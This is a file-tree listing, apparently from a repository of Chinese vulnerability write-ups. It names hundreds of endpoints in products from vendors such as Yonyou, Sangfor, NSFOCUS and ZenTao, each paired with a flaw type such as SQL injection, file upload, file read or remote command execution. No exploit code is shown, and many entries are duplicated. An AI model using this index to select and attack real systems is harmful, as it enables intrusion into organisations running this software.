├── 海翔ERP SQL注入漏洞.md
└── 海翔ERP-SQL注入漏洞.md
├── 海翔药业云平台
└── 成都海翔软件有限公司海翔药业云平台存在sql注入.md
├── 润乾报表
├── 润乾报表InputServlet存在任意文件上传漏洞.md
├── 润乾报表InputServlet存在任意文件读取漏洞.md
├── 润乾报表InputServlet接口存在文件上传漏洞.md
├── 润乾报表dataSphereServlet任意文件上传.md
├── 润乾报表dataSphereServlet接口存在任意文件读取漏洞.md
└── 润乾报表平台InputServlet存在任意文件读取漏洞.md
├── 润申信息科技ERP系统
├── 润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞.md
└── 润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞.md
├── 润申信息管理系统
└── 润申企业标准化管理系统DefaultHandler存在SQL注入漏洞.md
├── 深信服
├── 某x服应用交付系统命令执行漏洞.md
├── 某服 sxf-报表系统命令执行漏洞.md
├── 某服-sxf-报表系统命令执行漏洞.md
├── 深信服SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE.md
├── 深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md
├── 深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞.md
├── 深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md
├── 深信服SG上网优化管理系统
│ └── 深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md
├── 深信服下一代防火墙NGAF RCE漏洞.md
├── 深信服下一代防火墙NGAF-RCE漏洞.md
├── 深信服下一代防火墙NGAF
│ └── 深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md
├── 深信服下一代防火墙NGAF任意文件读取漏洞.md
├── 深信服应用交付管理系统
│ ├── 深信服应用交付管理系统download存在任意文件读取漏洞.md
│ └── 深信服应用交付管理系统rep_login远程命令执行漏洞.md
├── 深信服数据中心管理系统 XML 实体注入漏洞.md
├── 深信服数据中心管理系统-XML-实体注入漏洞.md
└── 深信服科技EDR
│ ├── 深信服EDR平台存在任意用户登录漏洞.md
│ └── 深信服EDR平台存在远程命令执行漏洞.md
├── 深圳亮钻科技有限公司
└── 深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞.md
├── 深圳国威电子
└── 国威HB1910数字程控电话交换机generate.php未授权RCE漏洞.md
├── 深圳市子辰视讯科技有限公司
└── 深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入.md
├── 深圳市拓普泰尔科技有限公司
└── 深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md
├── 深圳市昂捷信息技术股份有限公司
├── EnjoyRMISEnjoyRMIS_WS存在目录遍历漏洞.md
├── EnjoyRMISGetChildGroupSql1存在SQL注入漏洞.md
├── EnjoyRMISGetOAById存在SQL注入漏洞.md
├── EnjoyRMISGetOCashById存在SQL注入漏洞.md
├── EnjoyRMISGetOCgpById存在SQL注入漏洞.md
├── EnjoyRMISGetOCountById存在SQL注入漏洞.md
├── EnjoyRMISGetOCpById存在SQL注入漏洞.md
├── EnjoyRMISGetODById存在SQL注入漏洞.md
└── EnjoyRMISGetOSpById存在SQL注入漏洞.md
├── 深圳市朗驰欣创科技股份有限公司
└── 深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞.md
├── 深圳市锐明技术股份有限公司
├── 深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞.md
├── 深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞.md
├── 深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md
└── 深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞.md
├── 深圳誉龙数字技术有限公司
├── 誉龙数字执法记录仪管理平台FindById存在SQL注入漏洞.md
└── 誉龙数字执法记录仪管理平台TimeSyn远程命令执行.md
├── 深澜计费管理系统
├── 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md
├── 深澜计费管理系统down-load存在任意文件读取漏洞.md
├── 深澜计费管理系统proxy存在任意文件读取漏洞.md
└── 深澜计费管理系统strategy存在反序列化RCE漏洞.md
├── 温州市易天信息科技有限公司
└── 易天智能eHR管理平台任意用户添加漏洞.md
├── 湖南众合百易信息技术有限公司
└── 资产管理运营系统comfileup前台文件上传漏洞.md
├── 湖南建研信息技术股份有限公司
├── 湖南建研工程质量检测系统Attachment存在任意文件上传漏洞.md
├── 湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞.md
└── 湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md
├── 湖南建研检测系统
├── 湖南建研-检测系统 admintool 任意文件上传.md
├── 湖南建研-检测系统-admintool-任意文件上传.md
├── 湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞.md
└── 湖南建研质量监测系统upload.ashx文件上传漏洞.md
├── 满客宝
├── 满客宝后台管理系统downloadWebFile任意文件读取漏洞.md
└── 满客宝智慧食堂预定系统selectUserByOrgId存在未授权访问漏洞.md
├── 满客宝智慧食堂系统
├── 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md
└── 满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md
├── 漫画系统
├── 微信公众号小说漫画系统fileupload.php存在前台任意文件上传漏洞.md
└── 微信公众号小说漫画系统前台任意文件写入漏洞.md
├── 潍微科技
└── 潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md
├── 瀚霖科技股份有限公司
├── HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md
└── 瀚霖科技股份有限公司ISS-7000v2网关login_handler.cgi存在命令执行漏洞.md
├── 灵当CRM
├── 灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md
├── 灵当CRM系统接口getOrderList存在SQL注入漏洞.md
├── 灵当CRM系统接口multipleUpload.php文件上传漏洞.md
├── 灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md
├── 灵当CRM系统接口uploadfile文件上传漏洞.md
└── 灵当CRM系统接口wechatSession文件上传漏洞.md
├── 点企来客服系统
├── 点企来客服系统getwaitnum存在sql注入漏洞.md
└── 点企来客服系统存在硬编码漏洞.md
├── 热网无线监测系统
├── 热网无线监测系统GetMenuItem存在SQL注入漏洞.md
└── 热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md
├── 爱数企业网盘
└── 爱数企业云盘存在信息泄露漏洞.md
├── 物业专项维修资金管理系统
└── 物业专项维修资金管理系统漏洞.md
├── 环境自动监测监控系统
└── 3C环境自动监测监控系统ReadLog文件读取漏洞.md
├── 珠海新华通软件股份有限公司
└── 珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md
├── 瑞友天翼应用虚拟化系统
├── 瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md
├── 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md
└── 瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞.md
├── 瑞斯康达
├── 瑞斯康达-多业务智能网关-RCE.md
├── 瑞斯康达main.asp未授权访问漏洞.md
└── 瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md
├── 瑞斯康达科技发展股份有限公司
└── 瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞.md
├── 瑞星EDR
└── 瑞星EDR-XSS漏洞可打管理员cookie.md
├── 生命港湾信息技术
└── 生命港湾服务配置工具平台Download任意文件读取漏洞.md
├── 用友OA
├── 某友时空KSOA PayBill SQL注入漏洞.md
├── 某友时空KSOA-PayBill-SQL注入漏洞.md
├── 用友 GRP U8 license_check.jsp 存在SQL注入.md
├── 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞.md
├── 用友 NC Cloud jsinvoke 任意文件上传漏洞.md
├── 用友 NC uapws wsdl XXE漏洞.md
├── 用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md
├── 用友-GRP-U8-license_check.jsp-存在SQL注入.md
├── 用友-NC-Cloud-jsinvoke-任意文件上传漏洞.md
├── 用友-NC-uapws-wsdl-XXE漏洞.md
├── 用友-U9-PatchFile.asmx任意文件上传漏洞.md
├── 用友CRM 任意文件读取漏洞.md
├── 用友CRM-任意文件读取漏洞.md
├── 用友CRM客户关系管理系统import.php存在任意文件上传漏洞.md
├── 用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md
├── 用友CRM系统uploadfile.php接口存在任意文件上传.md
├── 用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞.md
├── 用友GRP-U8-FileUpload任意文件上传.md
├── 用友GRP-U8-PayReturnForWcp接口存在XXE漏洞.md
├── 用友GRP-U8-Proxy存在SQL注入漏洞.md
├── 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md
├── 用友GRP-U8-UploadFileData任意文件上传.md
├── 用友GRP-U8-bx_dj_check.jsp存在SQL注入.md
├── 用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入.md
├── 用友GRP-U8-listSelectDialogServlet存在SQL注入.md
├── 用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入.md
├── 用友GRP-U8-obr_zdybxd_check存在sql注入漏洞.md
├── 用友GRP-U8-operOriztion存在SQL注入漏洞.md
├── 用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞.md
├── 用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞.md
├── 用友GRP-U8-ufgovbank存在XXE漏洞.md
├── 用友GRP-U8-userInfoWeb存在SQL注入.md
├── 用友GRP-U8存在XML注入漏洞.md
├── 用友GRP-U8日志泄漏漏洞.md
├── 用友GRP-U8系统taskmanager_login存在SQL注入漏洞.md
├── 用友GRPA++Cloud政府财务云存在任意文件读取漏洞.md
├── 用友NC word.docx任意文件读取漏洞.md
├── 用友NC-ActionServlet存在SQL注入漏洞.md
├── 用友NC-Cloud uploadChunk 任意文件上传漏洞.md
├── 用友NC-Cloud-uploadChunk-任意文件上传漏洞.md
├── 用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞.md
├── 用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞.md
├── 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞.md
├── 用友NC-Cloud文件服务器用户登陆绕过漏洞.md
├── 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md
├── 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md
├── 用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md
├── 用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞.md
├── 用友NC-avatar接口存在文件上传漏洞.md
├── 用友NC-bill存在SQL注入漏洞.md
├── 用友NC-cartabletimeline存在SQL注入漏洞.md
├── 用友NC-complainbilldetail存在SQL注入漏洞.md
├── 用友NC-downCourseWare任意文件读取.md
├── 用友NC-downTax存在SQL注入漏洞.md
├── 用友NC-oacoSchedulerEvents接口存在sql注入漏洞.md
├── 用友NC-pagesServlet存在SQL注入.md
├── 用友NC-process存在SQL注入漏洞.md
├── 用友NC-runStateServlet接口存在SQL注入漏洞.md
├── 用友NC-saveDoc.ajax存在任意文件上传漏洞.md
├── 用友NC-showcontent接口存在sql注入漏洞.md
├── 用友NC-uploadControl接口存在文件上传漏洞.md
├── 用友NC-warningDetailInfo接口存在SQL注入漏洞.md
├── 用友NC-word.docx任意文件读取漏洞.md
├── 用友NC-workflowImageServlet接口存在sql注入漏洞.md
├── 用友NCCloud系统runScript存在SQL注入漏洞.md
├── 用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入.md
├── 用友NC_Cloud_soapFormat.ajax接口存在XXE.md
├── 用友NC_grouptemplet文件上传漏洞.md
├── 用友NC_saveImageServlet接口存在文件上传漏洞.md
├── 用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151).md
├── 用友NC接口ConfigResourceServlet存在反序列漏洞.md
├── 用友NC接口PaWfm存在sql注入漏洞.md
├── 用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013).md
├── 用友NC接口download存在SQL注入漏洞.md
├── 用友NC接口saveXmlToFIleServlet存在文件上传.md
├── 用友NC的download文件存在任意文件读取漏洞.md
├── 用友NC系统FileManager接口存在任意文件上传漏洞.md
├── 用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043).md
├── 用友NC系统linkVoucher存在sql注入漏洞.md
├── 用友NC系统printBill接口存在任意文件读取漏洞.md
├── 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md
├── 用友NC系统registerServlet接口存在JNDI注入漏洞.md
├── 用友NC系统word.docx存在信息泄露漏洞.md
├── 用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302).md
├── 用友NC系统接口link存在SQL注入漏洞.md
├── 用友NC系统接口yerfile_down存在SQL注入漏洞.md
├── 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞.md
├── 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞.md
├── 用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md
├── 用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞.md
├── 用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞.md
├── 用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md
├── 用友U8-CRM接口rellistname.php存在SQL注入漏洞.md
├── 用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞.md
├── 用友U8-CRM系统chkService.php存在SQL注入漏洞.md
├── 用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞.md
├── 用友U8-CRM系统getDeptName存在SQL注入漏洞.md
├── 用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞.md
├── 用友U8-CRM系统接口attrlist存在SQL注入漏洞.md
├── 用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入.md
├── 用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md
├── 用友U8-Cloud upload任意文件上传漏洞.md
├── 用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md
├── 用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md
├── 用友U8-Cloud-TableInputOperServlet存在反序列化漏洞.md
├── 用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md
├── 用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞.md
├── 用友U8-Cloud-upload任意文件上传漏洞.md
├── 用友U8-Cloud接口FileManageServlet存在反序列漏洞.md
├── 用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md
├── 用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞.md
├── 用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞.md
├── 用友U8-Cloud系统XChangeServlet接口存在XXE漏洞.md
├── 用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md
├── 用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞.md
├── 用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md
├── 用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023).md
├── 用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md
├── 用友U8-Cloud系统接口approveservlet存在SQL注入漏洞.md
├── 用友U8-Cloud系统接口esnserver存在任意文件上传漏洞.md
├── 用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞.md
├── 用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞.md
├── 用友U8-cloud RegisterServlet接口存在SQL注入漏洞.md
├── 用友U8-cloud-RegisterServlet接口存在SQL注入漏洞.md
├── 用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md
├── 用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md
├── 用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞.md
├── 用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md
├── 用友U8GRP-fastjson漏洞.md
├── 用友U8_Cloud-base64存在SQL注入漏洞.md
├── 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md
├── 用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md
├── 用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞.md
├── 用友U9-PatchFile.asmx接口存在任意文件上传漏洞.md
├── 用友U9-UMWebService.asmx存在文件读取漏洞.md
├── 用友U9系统DoQuery接口存在SQL注入.md
├── 用友Ufida-ELTextFile.load.d任意文件读取漏洞.md
├── 用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md
├── 用友crm-swfupload接口存在任意文件上传漏洞.md
├── 用友crm客户关系管理help.php存在任意文件读取漏洞.md
├── 用友nc-cloud RCE.md
├── 用友nc-cloud-RCE.md
├── 用友nc电子采购信息系统securitycheck存在sql注入.md
├── 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md
├── 用友u9系统接口GetConnectionString存在信息泄露漏洞.md
├── 用友u9系统接口TransWebService存在未授权访问漏洞.md
├── 用友政务财务系统FileDownload存在任意文件读取漏洞.md
├── 用友时空KSOA-imagefield接口存在SQL注入漏洞.md
├── 用友时空KSOA-linkadd.jsp存在SQL注入漏洞.md
├── 用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞.md
├── 用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md
├── 用友智石开PLM-getWorkGroups存在信息泄露漏洞.md
├── 用友畅捷通-TPlus-CheckMutex存在sql注入漏洞.md
├── 用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞.md
├── 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md
├── 用友畅捷通CRM-create_site.phpSQL注入漏洞.md
├── 用友畅捷通RRATableController存在反序列化漏洞.md
├── 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞.md
├── 用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md
├── 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md
├── 用友移动管理平台uploadIcon任意文件上传漏洞.md
├── 用友移动系统管理getFileLocal接口存在任意文件读取.md
├── 用友移动系统管理uploadApk接口存在任意文件上传.md
├── 用友系统-U9企业版存在任意文件上传漏洞.md
├── 畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md
├── 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md
└── 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md
├── 申瓯通信在线录音管理系统
├── 申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞.md
└── 申瓯通信在线录音管理系统download任意文件读取漏洞.md
├── 申瓯通信设备有限公司
├── 申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞.md
└── 申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞.md
├── 电信网关配置管理
├── 电信网关配置管理后台del_file.php接口存在命令执行漏洞.md
├── 电信网关配置管理后台ipping.php存在命令执行漏洞.md
├── 电信网关配置管理后台rewrite.php接口存在文件上传漏洞.md
└── 电信网关配置管理后台upload_channels.php接口存在文件上传漏洞.md
├── 电信网关配置管理系统
├── 电信网关配置管理系统rewrite存在文件上传漏洞.md
└── 电信网关配置管理系统存在弱口令漏洞.md
├── 电力系统控制软件
├── Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md
└── Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞.md
├── 电子图书阅读平台
└── 电子图书阅读平台downFile.aspx存在SQL注入漏洞.md
├── 电子文档安全管理系统
├── 电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md
└── 电子文档安全管理系统backup存在任意文件读取漏洞.md
├── 电子资料管理系统
└── 电子资料管理系统ImageUpload.ashx文件上传漏洞.md
├── 百为流控
└── 百为智能流控路由器存在命令执行漏洞.md
├── 百卓
├── 百卓SmartSQL命令注入漏洞.md
├── 百卓Smartuploadfile存在任意文件上传漏洞.md
└── 百卓Smart后台任意文件上传漏洞.md
├── 百择唯供应链
├── 百择唯供应链存在RankingGoodsList2存在SQL注入漏洞.md
├── 百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞.md
└── 百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md
├── 百易云资产管理系统
└── 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md
├── 皓峰
├── 皓峰防火墙login.php存在SQL注入漏洞.md
├── 皓峰防火墙setdomain存在信息泄露漏洞.md
└── 皓峰防火墙存在弱口令漏洞.md
├── 盲盒抽奖小程序系统
└── 盲盒抽奖小程序系统存在任意文件读取漏洞.md
├── 真内控国产化平台
└── 真内控国产化平台preview存在任意文件读取漏洞.md
├── 真内控国产化开发平台
└── 真内控国产化开发平台接口preview任意文件读取漏洞.md
├── 睿因Wavlink
├── 睿因 Wavlink WL_WNJ575A3 远程命令执行.md
└── 睿因-Wavlink-WL_WNJ575A3-远程命令执行.md
├── 知识吾爱纯净版小程序系统
└── 知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md
├── 短剧影视小程序
├── 短剧影视小程序前台base64_image_content任意文件上传漏洞.md
├── 短剧影视小程序前台juhecurl任意文件读取漏洞.md
└── 短剧影视小程序前台未授权漏洞.md
├── 短视频系统视频知识付费系统
└── 短视频系统视频知识付费系统存在任意文件读取漏洞.md
├── 碧海威
├── 碧海威L7产品confirm存在命令执行漏洞.md
├── 碧海威L7多款产品confirm存在命令执行漏洞.md
├── 碧海威L7多款产品index存在命令执行漏洞.md
├── 碧海威L7多款产品jumper存在命令执行漏洞.md
├── 碧海威L7多款产品存在后台命令执行漏洞.md
└── 碧海威L7多款产品存在弱口令漏洞.md
├── 社交系统
└── 某仿soul欲音社交系统存在任意文件读取漏洞.md
├── 禅道
├── 禅道 16.5 router.class.php SQL注入漏洞.md
├── 禅道 v18.0-v18.3 存在后台命令执行漏洞.md
├── 禅道-16.5-router.class.php-SQL注入漏洞.md
├── 禅道-v18.0-v18.3-存在后台命令执行漏洞.md
├── 禅道16.5accountSQL注入漏洞.md
├── 禅道18.5存在后台命令执行漏洞.md
├── 禅道20.7后台任意文件读取漏洞.md
├── 禅道21.1开源版存在SQL注入漏洞.md
├── 禅道开源项目管理软件信息收集.md
└── 禅道项目管理系统身份认证绕过漏洞.md
├── 福建科立讯通信
├── 福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md
├── 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md
├── 福建科立讯通信有限公司指挥调度管理平台RCE.md
└── 福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞.md
├── 私有云管理平台
└── 私有云管理平台存在登录绕过漏洞.md
├── 科拓全智能停车收费系统
├── 科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md
└── 科拓全智能停车收费系统Webservice.asmx存在任意文件上传.md
├── 科汛
└── 科汛新职教网校系统CheckOrder存在SQL注入漏洞.md
├── 科荣AIO
├── 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md
├── 科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md
├── 科荣AIO-ReadFile存在任意文件读取漏洞.md
├── 科荣AIO-moffice接口存在SQL注入漏洞.md
├── 科荣AIO管理系统endTime参数存在SQL注入漏洞.md
└── 科荣AIO系统接口UtilServlet存在代码执行漏洞.md
├── 科荣AIO管理系统
├── 科荣AIO管理系统ReportServlet存在任意文件读取漏洞.md
├── 科荣AIO管理系统ReportServlet存在目录遍历漏洞.md
├── 科荣AIO管理系统UtilServlet存在任意文件读取漏洞.md
└── 科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md
├── 科讯图书馆综合管理云平台
├── 科讯一卡通管理系统DataService.asmx存在SQL注入漏洞.md
├── 科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md
├── 科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md
└── 科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入.md
├── 秒优科技
└── 秒优科技-供应链管理系统doAction存在SQL注入漏洞.md
├── 竞优(广州)信息技术有限公司
├── 竞优(广州)信息技术有限公司商业租赁管理系统存在Trace信息泄露.md
└── 竞优(广州)信息技术有限公司商业租赁管理系统存在account信息泄露.md
├── 章管家-印章智慧管理平台
├── 章管家list.htm存在SQL注入漏洞.md
├── 章管家listUploadIntelligent接口存在sql注入漏洞.md
├── 章管家updatePwd.htm存在任意账号密码重置漏洞.md
└── 章管家前台任意文件上传漏洞(XVE-2024-19042).md
├── 章管家
└── 章管家Druid未授权访问漏洞.md
├── 简单图床
└── EasyImagedown.php任意文件读取漏洞.md
├── 管家婆
└── 管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞.md
├── 紫光档案管理系统
├── 紫光档案管理系统WorkFlow存在任意文件上传漏洞.md
└── 紫光档案管理系统editPass存在SQL注入漏洞.md
├── 紫光电子档案管理系统
├── 紫光档案管理系统mergeFile存在SQL注入漏洞.md
└── 紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md
├── 红帆OA
├── 红帆OA iorepsavexml.aspx 文件上传漏洞.md
├── 红帆OA zyy_AttFile.asmx SQL注入漏洞.md
├── 红帆OA-iorepsavexml.aspx-文件上传漏洞.md
├── 红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md
└── 红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md
├── 红海云eHR
├── 红海云eHR-PtFjk.mob存在任意文件上传漏洞.md
├── 红海云eHR系统kgFile.mob存在任意文件上传漏洞.md
└── 红海云eHR系统pc.mob存在sql注入漏洞.md
├── 绿盟
├── 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞.md
├── 某盟 SAS堡垒机 漏洞.md
├── 某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md
├── 某盟-SAS堡垒机-漏洞.md
├── 某盟sas安全审计系统任意文件读取漏洞.md
├── 绿盟 NF 下一代防火墙 任意文件上传漏洞.md
├── 绿盟-NF-下一代防火墙-任意文件上传漏洞.md
├── 绿盟SAS堡垒机Exec远程命令执行漏洞.md
├── 绿盟SAS堡垒机GetFile任意文件读取漏洞.md
├── 绿盟SAS堡垒机local_user.php任意用户登录漏洞.md
└── 绿盟日志审计系统存在命令执行漏洞.md
├── 网动统一通信平台
├── 网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞.md
├── 网动统一通信平台ActiveUC存在任意文件下载漏洞.md
├── 网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md
├── 网动统一通信平台meetingShow存在任意文件读取漏洞.md
└── 网动统一通信平台存在默认口令漏洞.md
├── 网康
├── 网康NS-ASG安全网关
│ ├── 网康NS-ASG应用安全网关存在远程命令执行漏洞.md
│ └── 网康NS-ASG应用安全网关源代码泄露漏洞.md
└── 网康下一代防火墙
│ └── 网康下一代防火墙远程命令执行漏洞.md
├── 网康科技
├── 网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞.md
├── 网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330).md
├── 网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md
├── 网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞.md
├── 网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞.md
├── 网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞.md
├── 网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞.md
└── 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md
├── 网御星云
├── 网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md
├── 网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md
└── 网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md
├── 网神
├── 某神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.md
├── 某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md
├── 某神SecSSL3600安全接入网关系统任意密码修改漏洞.md
├── 网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md
├── 网神SecGata3600安全网关
│ └── 网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md
├── 网神SecGata3600防火墙
│ ├── 网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md
│ ├── 网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md
│ ├── 网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md
│ ├── 网神SecGata3600防火墙sys_hand_upfile任意文件上传漏洞.md
│ └── 网神SecGata3600防火墙存在任意文件下载漏洞.md
├── 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md
├── 网神SecGate-3600-防火墙sys_hand_upfile-任意文件上传漏洞.md
├── 网神SecGate3600未授权添加用户漏洞.md
├── 网神防火墙 app_av_import_save文件上传漏洞.md
└── 网神防火墙-app_av_import_save文件上传漏洞.md
├── 网络验证系
└── 网络验证系统getInfo参数存在SQL注入漏洞.md
├── 网课交单平台
├── 29网课交单平台epay.php存在SQL注入漏洞.md
├── 网课交单平台epay存在SQL注入漏洞.md
└── 网课交单平台存在默认口令漏洞.md
├── 美团代付微信小程序系统
├── 美团代付微信小程序系统read.php任意文件读取漏洞.md
└── 美团代付微信小程序系统read存在任意文件读取漏洞.md
├── 美特CRM系统
├── 美特CRM系统接口anotherValue存在FastJson反序列化RCE.md
└── 美特CRM系统接口sync_emp_weixin存在反序列化漏洞.md
